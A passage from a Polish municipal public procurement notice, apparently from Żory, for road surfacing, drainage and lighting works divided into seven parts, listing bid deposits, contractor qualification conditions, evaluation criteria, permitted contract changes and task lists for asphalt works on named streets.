- ściągnięcie warstwy humusu,
- wyrównanie i zagęszczenie istniejącego nasypu z gruzu,
- wykonanie, formowanie i zagęszczanie nasypu,
- ułożenie krawężników 15x30x100 betonowych na ławie betonowej z oporem,
- ułożenie obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- wykonanie podbudowy z kruszywa łamanego,
- wykonanie nawierzchni z kostki betonowej Starobruk gr. 8 cm,
- montaż wpustów deszczowych,
- montaż studni zbiorczych,
- wykonanie przykanalików z rury PVC O200,
- wykonanie kolektora z rury PVC O315 z podłączeniem do istniejącej kanalizacji deszczowej,
- budowa oświetlenia (przesunięcie słupa oraz zabudowanie nowych słupów wraz z wysięgnikami, oprawami i ułożeniem kabla),
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- wykonanie nasadzenia zastępczego drzew i krzewów w proporcjach 1:1 względem drzew i krzewów usuniętych na podstawie uzyskanego pozwolenia na ich usunięcie (gatunek drzew do nasadzenia: lipa drobnolistna o minimalnej wysokości 400 cm i minimalnym obwodzie pnia 18 cm),
- humusowanie poboczy z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.


Wymagania ogólne dotyczące robót drogowych		
- Wykonać regulację wysokościową istniejących studni kanalizacyjnych, teletechnicznych, włazów (pokryw) kanałów ciepłowniczych oraz zaworów wodociągowych, gazowych - w przypadku wystąpienia kolizji  z zakresem prac.
- Wykonawca w ramach zadania wykona i przekaże Zamawiającemu inwentaryzację geodezyjną powykonawczą z naniesieniem na zasoby geodezyjne przez uprawnionego geodetę w 3 egz. (odrębnie dla każdej części oraz zadania) - przedłożyć na dzień odbioru lub przedstawić poświadczenie z RZG o złożeniu materiałów z prac inwentaryzacyjnych.
- Roboty prowadzić zgodnie z instrukcją oznakowania robót prowadzonych w pasie drogowym, a w razie  konieczności opracować i zatwierdzić w wydziale Infrastruktury Miejskiej i Inwestycji Urzędu Miasta Żory projekt organizacji ruchu - realizuje Wykonawca a koszty uwzględnia w ofercie (koszty ogólne).
- W czasie wykonywania robót zapewnić dojazd i dojście do posesji.
- Wykonawca we wskazanych miejscach przez Zamawiającego wykona badania nośności podłoża gruntowego płytą VSS lub sondą dynamiczną, wyniki badań zostaną dostarczone Zamawiającemu najpóźniej w dniu odbioru robót. Badania wykonać przy udziale przedstawicieli Zamawiającego.
- Wykonawca odpowiada za ochronę środowiska na placu budowy i w jego otoczeniu, podejmuje odpowiednie środki w celu zabezpieczenia dróg prowadzących do placu budowy przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi. Po zakończeniu robót przywraca je do stanu pierwotnego.
- Stosowane materiały powinny posiadać atesty oraz deklaracje zgodności - materiały potrzebne dla celów realizacji przedmiotowego zamówienia są w gestii Wykonawcy.
- Masy ziemne, gruz i odpady powstałe w trakcie robót przekazać odbiorcy odpadu posiadającemu zezwolenie na prowadzenie działalności w zakresie odzysku odpadów zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na prowadzenie przetwarzania odpadów. Przekazanie odpadów należy udokumentować pisemnie.
- Wykonanie zasilania w energię elektryczną oraz wodę dla potrzeb placu budowy wg potrzeb oraz demontaż zasilania - realizuje Wykonawca a koszty uwzględnia w ofercie (koszty ogólne).
- Dla planowanych robót drogowych przed rozpoczęciem robót należy dokonać geodezyjnego okazania granic działek pasa drogowego.

Przedstawione w dokumentacji przetargowej wskazania na urządzenia techniczne/  materiały/znak towarowy z podaniem producenta oraz wskazania na normy o których mowa w art. 30 ust. 1-3 ustawy pzp, należy traktować jako przykładowe, ze względu na zasady ustawy pzp, a zwłaszcza art. 29 i 30. Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji przetargowej wskazania z zachowaniem odpowiednich, równoważnych parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem zamówienia.
Wykonawca jest zobowiązany wykazać w ofercie jakie elementy zostały zmienione i określić jakie w ich miejsce proponuje. 
Ponadto Wykonawca winien wykazać w sposób nie budzący wątpliwości, że wskazane rozwiązania są równoważne..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7, 45.31.11.00-1, 45.31.12.00-2, 45.31.61.00-6, 45.11.00.00-1, 45.23.30.00-9, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część I - 15.000,00zł (słownie: piętnaście tysięcy złotych 0/00).
Część II -  10.000,00 zł (słownie: dziesięć tysięcy złotych 0/00).
Część III - 5.000,00zł (słownie: pięć tysięcy złotych 0/00).
Część IV - 10.000,00 zł (słownie: dziesięć tysięcy złotych 0/00).
Część V - 5.000,00zł (słownie: pięć tysięcy złotych 0/00).
Część VI - 10.000,00 zł (słownie: dziesięć tysięcy złotych 0/00).
Część VII - 2.000,00zł (słownie: dwa tysiące złotych 0/00).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj.: 
a)	dla części 1 - 3 roboty budowlane polegającą na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każda obejmowała swoim zakresem wykonanie min. 1500 m2 nawierzchni z asfaltu. 
W przypadku gdy Wykonawca składa ofertę również na część 6 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 1 zamówienia.

b)	dla części 2 - 3 roboty budowlane polegające na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każda obejmowała swoim zakresem wykonanie min. 500 m2 nawierzchni z kostki brukowej.
W przypadku gdy Wykonawca składa ofertę również na część 5 albo 7 albo 5 i 7 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 2 zamówienia.

c)	dla części 5 - 1 robotę budowlaną polegające na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, która obejmowała swoim zakresem wykonanie min. 700 m2 nawierzchni z kostki brukowej.
W przypadku gdy Wykonawca składa ofertę również na część 2 albo 2 i 7 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 2 zamówienia. 
W przypadku gdy Wykonawca składa ofertę również na część 7 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 5 zamówienia

d)	dla części 6 - 1 robotę budowlaną polegającą na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, która obejmowała swoim zakresem wykonanie min. 500 m2 nawierzchni z asfaltu.
W przypadku gdy Wykonawca składa ofertę również na część 1 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 1 zamówienia.

e)	dla części 7 - 1 robotę budowlaną polegającą na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, która obejmowała swoim zakresem wykonanie min. 500 m2 nawierzchni z kostki brukowej.
W przypadku gdy Wykonawca składa ofertę również na część 2 albo 2 i 5 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 2 zamówienia.
 W przypadku gdy Wykonawca składa ofertę również na część 5 wystarczające jest że wykaże spełnienie warunku przypisanego dla części 5 zamówienia.

oraz  załączy dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku ubiegania się o udzielenie zamówienia na część 3 i 4 Zamawiający nie opisuje warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za kierowanie robotami budowlanymi:
a)	w specjalności obejmującej uprawnienia do budowy lub przebudowy dróg (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy) - w przypadku ubiegania się o realizację części 1 i/lub 2 i/lub 3 i/lub 4 i/lub,
b)	w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych, sieci instalacji sanitarnych oraz w specjalności obejmującej uprawnienia do budowy lub przebudowy dróg (wszystkie wyżej wymienione uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy)  - w przypadku ubiegania się o realizację części 5 i /lub 7,
c)	w specjalności instalacyjnej w zakresie sieci i instalacji elektrycznych, sieci instalacji sanitarnych, w specjalności konstrukcyjno-budowlanej oraz w specjalności obejmującej uprawnienia do budowy lub przebudowy dróg (wszystkie wyżej wymienione uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy) - w przypadku ubiegania się o realizację części 6,
wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacją o podstawie do dysponowania tymi osobami. 

Zamawiający dopuszcza łączenie funkcji kierowników robót i sprawowanie ich przez jedną osobę pod warunkiem posiadania przez tę osobę odpowiednich uprawnień.

Zamawiający dopuszcza aby ta sama osoba pełniła funkcję kierownika robót w przypadku ubiegania się o realizację więcej niż 1 części zamówienia.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (Dz. U. z 2003r. Nr 207, poz. 2016 ze zmianami).

Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy dotyczące  obowiązku podatkowego.

Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt - jeżeli Wykonawca polega na zasobach innych  podmiotów.

W celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązanie lub inny dokument, ponadto winno wskazywać: 
a) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu,
b) w jaki sposób zostaną wykorzystane zasoby innego podmiotu przez wykonawcę przy wykonywaniu zamówienia,
c) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem,
d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres gwarancji na roboty budowlane (36,48,60 miesiące) - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
I. Przyczyna/okoliczności    
Konieczność zmiany dokumentacji projektowej wynikła w trakcie realizacji inwestycji 
Skutek - zmiana w umowie/aneks
Zmiana terminu realizacji zamówienia o  tyle dni, ile trwało przeprojektowanie, dostawa materiałów i realizacja wynikłe ze zmian projektowych 
II. Przyczyna/okoliczności    
Zmiana producenta materiałów /urządzeń, wycofania materiałów /urządzeń z użycia 
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zamówienia o czas potrzebny na zakup nowych materiałów/urządzeń 
III. Przyczyna/okoliczności                                         
Wystąpienie zdarzeń losowych - klęska żywiołowa
Skutek - zmiana w umowie/aneks
Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót 
IV. Przyczyna/okoliczności                                         
Zmiana przepisów o podatku od towarów i usług 
Skutek - zmiana w umowie/aneks
zmniejszenie/zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT 
V. Przyczyna/okoliczności                                         
Przekształcenie firmy, zmiana nazwy firmy 
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy 
VI. Przyczyna/okoliczności                                         
Zmiana lub rezygnacja z podwykonawcy będącego podmiotem na zasobach którego opierał się wykonawca w celu spełnienia warunków udziału w postępowaniu na zasadach art. 26 ust. 2b 
Skutek - zmiana w umowie/aneks
Wprowadzenie  innego podmiotu (Podwykonawca lub Wykonawca) który potwierdza spełnienie warunków w stopniu nie mniejszym niż wymagany w SIWZ 
VII. Przyczyna/okoliczności                                         
Długotrwałe, tj. powyżej 5 dni kalendarzowych, warunki atmosferyczne uniemożliwiające prowadzenie robót  zapisane w dzienniku budowy 
Skutek - zmiana w umowie/aneks
Przedłużenie terminu realizacji umowy o tyle dni, ile trwały warunki atmosferyczne uniemożliwiające prowadzenie robót 
VIII. Przyczyna/okoliczności 
 Potrzeba wprowadzenia lub zmiany zakresu robót wykonywanych przez podwykonawcę.
Skutek - zmiana w umowie/aneks
Spisania aneksu do umowy określającego zakres robót wykonywanych przez podwykonawcę
IX. Przyczyna/okoliczności 
Znalezienie niewybuchów
Skutek - zmiana w umowie/aneks
Przesunięcie terminu wykonania zadania o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów 
X. Przyczyna/okoliczności 
Wstrzymanie prac budowlanych przez właściwy organ lub Zamawiającego z przyczyn niezawinionych przez Wykonawcę 
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni ile trwało wstrzymanie robót 
XI. Przyczyna/okoliczności 
Przedłużająca się powyżej 30 dni procedura wydania przez Marszałka Województwa Śląskiego decyzji o pozwoleniu na wycinkę drzew - dotyczy część 6 i 7
Skutek - zmiana w umowie/aneks
Spisanie aneksu do umowy wydłużającego termin wykonania robót o tyle dni o ile wydłużyła się procedura wydania decyzji o pozwoleniu na wycinkę drzew - dotyczy część 6 i 7.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zory.pl/?c=7074<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, pokój 203, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2016 godzina 12:00, miejsce: Urząd Miasta Żory, Aleja Wojska Polskiego 25, 44-240 Żory, informacja - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w kryterium 1 w którym Zamawiającemu zależy, aby Wykonawca przedstawił jak najniższy wskaźnik - cena - zostanie zastosowany następujący wzór arytmetyczny: (n : b) x 98 
Oferta z najniższą ceną otrzyma 98 punktów, pozostałe proporcjonalnie mniej, gdzie:
a) n - wartość oferty z najmniejszą wartością, 
b) b - wartość oferty badanej, 
c) 98 - wskaźnik stały,

w kryterium 2 ocena punktowa w kryterium okres gwarancji na roboty budowlane przedstawia się następująco:
1)	za udzielenie gwarancji wynoszącej 36 miesięcy			- 0 punktów
2)	za udzielenie gwarancji wynoszącej 48 miesięcy			- 1 punkt 
3)	za udzielenie gwarancji wynoszącej 60 miesięcy			- 2 punkty 

W niniejszym kryterium Wykonawca może uzyskać maksymalnie 2 pkt. 
Zgodnie z SIWZ zaoferowany okres gwarancji nie może być krótszy niż 36 miesięcy (w przypadku zaoferowania okresu gwarancji krótszego niż 36 miesięcy oferta zostanie odrzucona zgodnie z art. 89 ust. 1 pkt 2 ustawy Pzp)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nawierzchnie asfaltowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 Nawierzchnie asfaltowe
Zadanie 1 Wykonanie nawierzchni asfaltowej drogi zbiorczej do terenów inwestycyjnych przy Obwodnicy Północnej: 
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie rowków pod krawężniki z wywozem urobku na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- ułożenie nowych krawężników betonowych 15x30cm wzdłuż drogi na ławie betonowej z oporem,
- wyrównanie i zagęszczenie istniejącej podbudowy drogi,
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nawierzchni drogi z mieszanek mineralno-bitumicznych:
c) warstwa wiążąca z mieszanki mineralno-bitumicznej gr. 6cm,
d) warstwa ścieralna z betonu asfaltowego gr. 5cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża sondą dynamiczną,
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 2  Wykonanie nawierzchni asfaltowej drogi ul. Leśników.
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- cięcie piłą nawierzchni bitumicznej,
- rozbiórka nawierzchni bitumicznej,
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- czyszczenie nawierzchni bitumicznej,
- czyszczenie poboczy,
- uzupełnienie ubytków w istniejącej nawierzchni,
- regulacja pionowa studzienek i włazów kanałowych
- skropienie nawierzchni drogowej asfaltem,
- wykonanie nowej nawierzchni z mieszanek mineralno-bitumicznych (warstwa ścieralna z betonu asfaltowego gr. 5cm),
- wykonanie zjazdów o nawierzchni z tłucznia kamiennego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Zadanie 3  Wykonanie nawierzchni asfaltowej ul. Goliasza.
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wyrównanie istniejącej podbudowy warstwą kruszywa łamanego pod nawierzchnie asfaltowe,
- badania nośności podbudowy,
- wykonanie nawierzchni drogi z mieszanek mineralno-bitumicznych:
c) warstwa wiążąca z mieszanki mineralno-bitumicznej gr. 4cm,
d) warstwa ścieralna z betonu asfaltowego gr. 4cm,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- wykonanie poboczy z destruktu asfaltowego ,
- porządkowanie terenu po robotach budowlanych.

Zadanie 4  Wykonanie nawierzchni asfaltowej drogi ul. Małej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- wykonanie podbudowy z kruszywa łamanego,
- profilowanie i zagęszczenie podbudowy,
- badania nośności podbudowy,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej gr. 4cm,
- wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 5  Wykonanie nawierzchni asfaltowej drogi ul. Zielnej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- wykonanie podbudowy z kruszywa łamanego,
- profilowanie i zagęszczenie podbudowy,
- badania nośności podbudowy,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej gr. 4cm,
- wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 6  Wykonanie  nawierzchni asfaltowej drogi ul. Pukowca
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- frezowanie nawierzchni asfaltowej,
- załadunek i wywóz materiałów z frezowania,
- regulacja pionowa włazów kanałowych studni kanalizacji sanitarnej,
- wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej gr. 4cm,
- wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy,
- porządkowanie terenu po robotach budowlanych.

Zadanie 7  Wykonanie nawierzchni asfaltowej drogi ul. Pszczyńskiej
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu,
- frezowanie nawierzchni asfaltowej,
- korytowanie drogi pod warstwy konstrukcyjne,
- załadunek i wywóz materiałów z korytowania na wysyp,
- wykonanie podbudowy z kruszywa łamanego,
- profilowanie i zagęszczenie podbudowy,
- wykonanie podbudowy zasadniczej z betonu asfaltowego AC22P,
- międzywarstwowe mechaniczne czyszczenie nawierzchni drogowej,
- międzywarstwowe skropienie nawierzchni drogowej asfaltem,
- wykonanie warstwy wyrównawczej z betonu asfaltowego AC16W,
- wykonanie warstwy ścieralnej warstwy ścieralnej z betonu asfaltowego AC11S,
- porządkowanie terenu po robotach budowlanych.

Zadanie 8  Wykonanie nawierzchni asfaltowej drogi ul. Podlesie.
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- cięcie piłą nawierzchni bitumicznej,
- rozbiórka nawierzchni bitumicznej,
- załadunek i wywóz materiałów z rozbiórki na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- czyszczenie nawierzchni bitumicznej,
- czyszczenie poboczy,
- uzupełnienie ubytków w istniejącej nawierzchni wraz z jej miejscowym wyrównaniem,
- częściowe poszerzenie podbudowy,
- regulacja pionowa studzienek i włazów kanałowych
- skropienie nawierzchni drogowej asfaltem,
